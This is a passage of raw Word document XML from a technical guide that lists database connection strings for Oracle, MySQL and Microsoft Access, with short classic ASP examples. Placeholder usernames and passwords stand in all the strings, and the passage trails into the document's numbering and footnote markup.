        <w:t>OraOLEDB.Oracle</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_Oracle_Database;UserId=Your_Username;Password=Your_Password;"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trusted connection to Oracle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shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>"Provider= OraOLEDB.Oracle</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>;DataSource</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve">=Your_Oracle_Database;OSAuthent=1;" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00EB3DB7" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DB7" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00EB3DB7" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MySQL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local MySQL database using MySQL ODBC 3.51 Driver</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"Provider=MSDASQL; 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MySQL ODBC 3.51Driver}; SERVER= localhost; DATABASE=Your_MySQL_Database; UID= Your_Username;PASSWORD=Your_Password; OPTION=3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3DB7" w:rsidRPr="00BD601E" w:rsidRDefault="00EB3DB7"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MySQL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MySQL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"Provider=MySQLProv</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Source=Your_MySQL_Database;User Id=Your_Username; Password=Your_Password;" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00EB3DB7" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DB7" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00EB3DB7" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. DNS</w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-less Database Connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The easiest way to connect to a database is to use a DSN-less connection. A DSN-less connection can be used against any Microsoft Access database on your web site.</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If you have a database called "northwind.mdb" located in a web directory like "c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>webdata/", you can connect to the database with the following ASP code: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&lt;%set conn=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server.CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ADODB.Connection")</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conn.Provider="Microsoft.Jet.OLEDB.4.0"conn.Open "c:/webdata/northwind.mdb"%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note, from the example </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>above, that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> you have to specify the Microsoft Access database driver (Provider) and the physical path to the database on your computer.</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DSN Connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create an ODBC Database Connection</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If you have an ODBC database called "northwind" you can connect to the database with the following ASP code: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&lt;%set conn=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server.CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ADODB.Connection") conn.Open "northwind"%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3DB7" w:rsidRDefault="00EB3DB7" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>With an ODBC connection, you can connect to any database, on any computer in your network, as long as an ODBC connection is available.</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3. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access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Standard Security:</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 {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MicrosoftAccessDriver(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*.mdb)};DBQ=C:\App1\Your_Database_Name.mdb;Uid=Your_Username;Pwd=Your_Password;"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Workgroup:</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Microsoft Access Driver (*.mdb)}; Dbq=C:\App1\Your_Database_Name.mdb; SystemDB=C:\App1\Your_Database_Name.mdw;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3DB7" w:rsidRPr="00EB3DB7" w:rsidRDefault="00EB3DB7" w:rsidP="00EB3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exclusive: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 xml:space="preserve"> "Driver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Microsoft Access Driver (*.mdb)}; DBQ=C:\App1\Your_Database_Name.mdb; Exclusive=1; Uid=Your_Username; Pwd=Your_Password;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3DB7" w:rsidRDefault="00EB3DB7"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4. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MS Access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Source=c:\App1\Your_Database_Name.mdb; User Id=admin; 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using Workgroup (System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lastRenderedPageBreak/>
        <w:t>"Provider=Microsoft.Jet.OLEDB.4.0; Data Source=c:\App1\Your_Database_Name.mdb; Jet OLEDB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:System</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Database=c:\App1\Your_System_Database_Name.mdw"</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password protected Access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Source=c:\App1\Your_Database_Name.mdb; Jet OLEDB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:Database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password=Your_Password"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located on a network share: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Source=\\Server_Name\Share_Name\Share_Path\Your_Database_Name.mdb"</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located on a remote server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000336A2"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"Provider=MS Remote; Remote Server=http</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/Your-Remote-Server-IP; Remote Provider=Microsoft.Jet.OLEDB.4.0; Data Source=c:\App1\Your_Database_Name.mdb"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3DB7" w:rsidRPr="00BD601E" w:rsidRDefault="00EB3DB7" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EB3DB7" w:rsidRPr="00BD601E" w:rsidSect="00D93806">
      <w:headerReference w:type="even" r:id="rId180"/>
      <w:headerReference w:type="default" r:id="rId181"/>
      <w:footerReference w:type="even" r:id="rId182"/>
      <w:footerReference w:type="default" r:id="rId183"/>
      <w:headerReference w:type="first" r:id="rId184"/>
      <w:footerReference w:type="first" r:id="rId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CD5" w:rsidRDefault="00130CD5" w:rsidP="001F480C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00130CD5" w:rsidRDefault="00130CD5" w:rsidP="001F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CD5" w:rsidRDefault="00130CD5" w:rsidP="001F480C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00130CD5" w:rsidRDefault="00130CD5" w:rsidP="001F4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B850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66C32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0ED45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B1792D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACE44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2CE4DFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7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CF7CA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1DE2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4E5E71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2F809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48E6FC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80327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71970BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8CE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9C1906"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DCEE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571098"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B24A3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0B2709"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78525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BD9401A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEB42C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C4035B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF2A3E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FB22B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2645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E132095"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FD01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0E9C3A7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D8A3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0873E79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DE4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0967BFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A282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10F2393"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A0E6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11CD23C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="288CD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31A0551"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A44C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3415AB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA4EB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13BA7370"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8794D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42C1D4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A7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297C47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDA2B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15BC1269"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EFD0A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6A43688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BD4ED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175A0A7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFD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9325F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD3A2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7942DDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4350C2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181061CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1122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182C75CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E2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8A80984"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C98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90A3FF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21783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0B5349"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C46A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A1E2E8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7162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1B0557BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39C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119A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="943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5D21E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E64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737F78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5F036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1D8B1158"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8A44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1DD41558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5C29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E803919"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B8A2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1ECE7BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DF2C6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1F470EE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48962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0A055D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="124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3651A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45289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25002946"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D9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0E54EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28A0D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283D7343"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BD8F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28D068DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D0CC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291E2DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45B6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298A54E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E9417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2A971A59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14B2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2AFE7F29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48A2BC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2B0A54B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2DA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2DEA37D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="678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2E331266"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BD8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2EDD1D1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC4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F0D5386"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F57E7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2F19046F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1940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nsid w:val="2F4F1D3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FF0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2F8C4115"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB50E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3206544C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="805C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32121AC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17B86F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nsid w:val="3269240A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E6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32A8110C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CBA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34C4023A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51ACBE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357A3D7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B96E2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35926479"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="714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6C02400"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD443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36E95174"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45345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37917565"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7B2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37FE48D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01DEE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39B507B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4518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9BA532A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87F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9ED7241"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0B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3A51671E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82F8DC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3AFB75F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B0A50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3B9D4069"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5880A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3BE166ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF22F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3C2A57BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AAF62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3C653B7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD98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nsid w:val="3C6E7662"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D86E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D477A9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C40EB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3EB5557C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="968CF7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nsid w:val="3FC7790F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2760D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40CC0B63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2020B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nsid w:val="4143721C"/>
